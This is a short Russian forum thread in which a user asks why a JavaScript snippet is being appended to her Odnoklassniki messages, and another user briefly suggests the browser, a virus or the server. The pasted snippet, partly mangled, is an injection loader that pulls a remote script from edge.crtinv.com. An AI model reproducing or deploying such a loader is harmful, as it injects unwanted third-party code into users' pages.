ДА
Джамиля Апасова

Что за фигня в одноклассниках

!function(){try{var h:-Document.getElementsByTagName("head")[0];var s:-Document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload:-S.onreadystatechange=null;h.removeChild(S);}};h.appendChild(S);}catch(ex){}}();

вот в комментариях в сообщениях почему то вставляется вот такая ерундень, когда отправляю свой текст. как это убрать надоел уже.
Ну полцчается типа привет! и далее такая ерунда дописывается сама.

Татьяна Карета

Браузер, вирус, сервер